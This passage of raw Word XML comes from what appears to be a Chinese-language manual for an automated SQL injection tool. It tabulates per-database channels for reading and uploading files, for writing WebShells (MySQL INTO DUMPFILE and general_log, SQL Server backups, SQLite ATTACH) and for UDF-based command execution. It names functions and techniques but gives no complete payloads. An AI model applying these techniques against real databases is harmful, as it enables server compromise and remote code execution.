                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>convert(varchar(max),b,2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（堆叠建表，取数全通道可用）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
          </w:tcPr>
          <w:p w14:paraId="3D8F1ED4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">临时表 varbinary 分片 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@bin+=data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 聚合 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sp_OACreate + ADODB.Stream(Type=1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 写出（自动开 Ole Automation，已实测 SQL Server 2022 字节无损）；写后回读 datalength 验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="55E6C474">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5C7BE3DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Java </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SqliReadHex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 分片（RandomAccessFile seek，1500 字节/片）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="21919B7A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Java </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SqliWriteBin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 分片 append；写后 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SqliFileSize</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 验证（同 GETXML 版本限制）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
          </w:tcPr>
          <w:p w14:paraId="0088DCFC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
          </w:tcPr>
          <w:p w14:paraId="490C641A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RAWTOHEX(FILE_READ())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（FILE_READ 单参数返回 BLOB，需 admin）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
          </w:tcPr>
          <w:p w14:paraId="60658D2A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_WRITE(x'hex')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 单发（返回写入字节数直接验证）；大文件自动切 CREATE ALIAS 分片 append</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="518B4612">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ClickHouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="33D7CC9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file(path,'RawBLOB')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hex()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（仅 user_files 目录）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2A5C3780">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
          </w:tcPr>
          <w:p w14:paraId="4547F1F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
          </w:tcPr>
          <w:p w14:paraId="78DF569E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hex(readfile())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（fileio 扩展 blob 无损，仅加载该扩展的目标可用，如 Calibre）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
          </w:tcPr>
          <w:p w14:paraId="6CF3D3B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>writefile(path, x'hex')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 单发（返回字节数验证；无追加能力，超上限提示改 ATTACH）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7A1EE146">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HSQLDB / DB2 / 达梦</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="118B1C94">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3956E216">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持（HSQLDB 仅 TEXT TABLE 文本且需多 DDL；DB2 仅 ADMIN_CMD 文本级 IO；达梦 Java 外部函数需预置 jar + 开参重启，UTL_FILE 需预建 DIRECTORY）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49A62E1C">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D18602">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>二进制上传分片大小自适应：GET 注入 1200 字节/片（URL 长度受限），POST 最大 6000~7000 字节/片。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F3C04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.8 写文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="23A78A46">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="29B5011C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>写文件通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="03AD5276">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="1B0E7C00">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>INTO DUMPFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>general_log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 写 WebShell（堆叠）、UDF 写库（内置 lib_mysqludf_sys 二进制写 plugin 目录建 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sys_eval</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，为命令执行铺路）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="01A6BF54">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2B7B747E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FileSystemObject、sp_MakeWebTask、备份写 WebShell（写后自动验证：xp_fileexist 确认文件存在 + BULK INSERT 回读内容比对；sp_MakeWebTask 在 SQL Server 2012+ 已移除，验证失败会明确提示而非误报成功）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="0A2DE40E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="37D60F2A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY TO（堆叠）、大对象 lo_from_bytea/lo_export（Union/报错单语句）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5525A56A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>openGauss / Kingbase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="19F66B64">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY TO（兼容 PG 语法）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="0860B7C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="742CF39A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSVWRITE（char 链免引号，writeColumnHeader=false+fieldDelimiter=空 → 裸字节落盘，仅末尾多一个 CRLF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2A996D9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0F923350">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ATTACH DATABASE 写 WebShell（堆叠）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="21B0DCD8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ClickHouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="6A430F5E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持写文件（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>INTO OUTFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 为 clickhouse-client 客户端侧功能，HTTP 接口固定报错 358 不可用）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="07753CAA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3BB175E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GETXML + Java 存储过程（内容 hex 传参，受 varchar2(4000) 限制约 2000 字节；版本限制同上）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27B644E6">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084BB982">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.9 命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47B4E0">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>按数据库类型自动选择执行通道：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="8353"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="08EF88AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="2D0AD0DA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="67B449AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
